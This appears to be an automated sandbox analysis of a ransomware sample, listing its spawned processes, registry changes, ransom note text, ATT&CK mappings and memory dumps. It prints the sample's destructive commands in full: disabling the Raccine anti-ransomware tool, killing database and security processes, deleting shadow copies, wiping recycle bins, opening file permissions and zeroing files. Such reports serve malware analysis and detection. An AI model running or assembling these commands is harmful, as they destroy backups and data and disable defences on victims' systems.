PID 1052 wrote to memory of 932	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	54
PID 1052 wrote to memory of 1620	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	58
PID 1052 wrote to memory of 1620	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	58
PID 1052 wrote to memory of 1620	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	58
PID 1052 wrote to memory of 1620	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	58
PID 1052 wrote to memory of 1016	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	59
PID 1052 wrote to memory of 1016	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	59
PID 1052 wrote to memory of 1016	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	59
PID 1052 wrote to memory of 1016	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	59
PID 1052 wrote to memory of 1824	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	61
PID 1052 wrote to memory of 1824	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	61
PID 1052 wrote to memory of 1824	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	61
PID 1052 wrote to memory of 1824	1052	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe	61

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe"
1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:1812
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:516
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:2032
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:820
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:592
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:960
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1080
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1804
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1956
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1820
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1996
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:932
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1620
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1016
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1048
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:240
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1956
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:852
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1848
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:548
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1624
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:592
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1972
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1804
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1520
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1036
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:960
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1512
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:684
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1824
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1904
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1488
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:820
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:756
- C:\Windows\SysWOW64\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1304
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:660
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Modifies Internet Explorer settings
  PID:1512
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1548
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1680
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:1612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.bin.sample.exe
  2⤵
  - Deletes itself
  PID:484
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:1036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Filesize
21KB

MD5
a215ed3b422daf38faf3d8c6f0fa0d73

SHA1
28c8a05a58aeccca480c5f613cff2210b10ac6ad

SHA256
d3488d67f11def1e705d04f9ff1b42103f66718f481e8781e96cf7f299acfa64

SHA512
a438e142f4fcb98eaa438ccf684d379d2533d4e3dcad3c1982f1bd8174b363720df6ad7ead494f813fd72a8ae470739c96edc7b6be93a7f2025c85d49ebc8465

Download Submit
memory/240-85-0x0000000000000000-mapping.dmp

Download
memory/516-64-0x0000000000000000-mapping.dmp

Download
memory/516-102-0x0000000000000000-mapping.dmp

Download
memory/548-93-0x0000000000000000-mapping.dmp

Download
memory/592-101-0x0000000000000000-mapping.dmp

Download
memory/592-68-0x0000000000000000-mapping.dmp

Download
memory/608-80-0x0000000000000000-mapping.dmp

Download
memory/660-118-0x0000000000000000-mapping.dmp

Download
memory/684-115-0x0000000000000000-mapping.dmp

Download
memory/820-66-0x0000000000000000-mapping.dmp

Download
memory/820-127-0x0000000000000000-mapping.dmp

Download
memory/852-89-0x0000000000000000-mapping.dmp

Download
memory/852-62-0x0000000000000000-mapping.dmp

Download
memory/932-74-0x0000000000000000-mapping.dmp

Download
memory/940-97-0x0000000000000000-mapping.dmp

Download
memory/948-82-0x0000000000000000-mapping.dmp

Download
memory/952-107-0x0000000000000000-mapping.dmp

Download
memory/960-110-0x0000000000000000-mapping.dmp

Download
memory/960-67-0x0000000000000000-mapping.dmp

Download
memory/1016-76-0x0000000000000000-mapping.dmp

Download
memory/1016-123-0x0000000074D91000-0x0000000074D93000-memory.dmp

Filesize
8KB

Download
memory/1036-109-0x0000000000000000-mapping.dmp

Download
memory/1044-78-0x0000000000000000-mapping.dmp

Download
memory/1044-117-0x0000000000000000-mapping.dmp

Download
memory/1048-83-0x0000000000000000-mapping.dmp

Download
memory/1052-61-0x0000000004880000-0x0000000004881000-memory.dmp

Filesize
4KB

Download
memory/1052-59-0x00000000012F0000-0x00000000012F1000-memory.dmp

Filesize
4KB

Download
memory/1060-114-0x0000000000000000-mapping.dmp

Download
memory/1080-69-0x0000000000000000-mapping.dmp

Download
memory/1080-94-0x0000000000000000-mapping.dmp

Download
memory/1268-95-0x0000000000000000-mapping.dmp

Download
memory/1328-122-0x0000000000000000-mapping.dmp

Download
memory/1392-86-0x0000000000000000-mapping.dmp

Download
memory/1464-92-0x0000000000000000-mapping.dmp

Download
memory/1484-105-0x0000000000000000-mapping.dmp

Download
memory/1488-124-0x0000000000000000-mapping.dmp

Download
memory/1512-113-0x0000000000000000-mapping.dmp

Download
memory/1516-106-0x0000000000000000-mapping.dmp

Download
memory/1520-108-0x0000000000000000-mapping.dmp

Download
memory/1560-100-0x0000000000000000-mapping.dmp

Download
memory/1604-87-0x0000000000000000-mapping.dmp

Download
memory/1620-75-0x0000000000000000-mapping.dmp

Download
memory/1624-98-0x0000000000000000-mapping.dmp

Download
memory/1692-120-0x0000000000000000-mapping.dmp

Download
memory/1724-84-0x0000000000000000-mapping.dmp

Download
memory/1784-96-0x0000000000000000-mapping.dmp

Download
memory/1800-91-0x0000000000000000-mapping.dmp

Download
memory/1804-70-0x0000000000000000-mapping.dmp

Download
memory/1804-104-0x0000000000000000-mapping.dmp

Download
memory/1812-63-0x0000000000000000-mapping.dmp

Download
memory/1812-111-0x0000000000000000-mapping.dmp

Download
memory/1816-99-0x0000000000000000-mapping.dmp

Download
memory/1820-72-0x0000000000000000-mapping.dmp

Download
memory/1824-77-0x0000000000000000-mapping.dmp

Download
memory/1824-116-0x0000000000000000-mapping.dmp

Download
memory/1832-121-0x0000000000000000-mapping.dmp

Download
memory/1848-90-0x0000000000000000-mapping.dmp

Download
memory/1904-119-0x0000000000000000-mapping.dmp

Download
memory/1908-81-0x0000000000000000-mapping.dmp

Download
memory/1956-88-0x0000000000000000-mapping.dmp

Download
memory/1956-71-0x0000000000000000-mapping.dmp

Download
memory/1972-103-0x0000000000000000-mapping.dmp

Download
memory/1996-73-0x0000000000000000-mapping.dmp

Download
memory/2004-112-0x0000000000000000-mapping.dmp

Download
memory/2004-79-0x0000000000000000-mapping.dmp

Download
memory/2032-128-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/2032-65-0x0000000000000000-mapping.dmp

Download
memory/2032-129-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/2032-130-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/2032-131-0x00000000049C2000-0x00000000049C3000-memory.dmp

Filesize
4KB

Download
memory/2032-133-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/2032-134-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/2032-125-0x0000000000000000-mapping.dmp

Download